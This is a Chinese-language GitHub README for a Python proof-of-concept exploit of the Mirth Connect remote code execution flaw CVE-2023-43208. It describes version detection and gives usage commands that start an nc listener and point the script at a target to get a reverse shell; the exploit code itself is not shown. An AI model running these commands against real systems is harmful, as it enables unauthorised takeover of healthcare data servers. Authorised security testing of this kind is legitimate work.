predyy/CVE-2023-43208
GitHub: predyy/CVE-2023-43208
针对 Mirth Connect CVE-2023-43208 RCE 漏洞的轻量级 Python 概念验证脚本,集成版本检测与反弹 Shell 利用功能。
Stars: 1 | Forks: 0
# CVE-2023-43208 Mirth Connect RCE PoC
针对 Mirth Connect 中 **CVE-2023-43208** 漏洞的概念验证 Python 脚本。
## 免责声明
仅在你拥有或明确获得授权测试的环境中使用。本仓库仅供安全研究、验证和防御性测试。作者对因使用本工具而导致的任何误用或损害不承担任何责任。
## 概述
`exp.py` 是 [PoC](https://github.com/K3ysTr0K3R/CVE-2023-43208-EXPLOIT) 的一个最小依赖版本,它可以:
- 检测目标是否为 Mirth Connect 实例
- 从 `/api/server/version` 请求 Mirth Connect 版本
- 检查版本是否低于 `4.4.1`
- 如果目标似乎存在漏洞,则向 `/api/users` 发送 XML payload
该脚本默认使用 **HTTPS**,可以通过 `--http` 切换为 **HTTP**。
## 用法
```
python3 exp.py -u -lh -lp [--http]
```
### 参数
- `-u`, `--url`: 目标 Mirth Connect URL 或主机
- `-lh`, `--lhost`: 用于反向连接的本地主机/IP
- `-lp`, `--lport`: 本地监听端口
- `--http`: 强制使用 HTTP 而非 HTTPS(默认为 HTTPS)
## 示例
首先启动一个监听器:
```
nc -lvnp 4444
```
运行脚本:
```
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444
```
针对仅支持 HTTP 的目标:
```
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http
```
## 注意事项
- 脚本中禁用了 SSL 证书验证。
- 脚本在发送 payload 之前会提示确认。
- 版本检测基于与 `4.4.1` 的语义比较。
- 被检测为 Mirth Connect 的目标不保证一定可以利用(网络、环境和运行时差异可能会影响结果)。
## 致谢
- 原始漏洞发现:IHTeam
- 原始代码:`K3ysTr0K3R` 和 `Chocapikk`
- 最小依赖版本:`predyy`
标签:API 安全, CISA项目, CVE-2023-43208, Maven, Mirth Connect, PoC, Python, RCE, T1059, XML 注入, 医疗信息学, 无后门, 暴力破解, 未授权访问, 漏洞验证, 编程工具, 网络安全, 远程代码执行, 逆向 Shell, 逆向工具, 隐私保护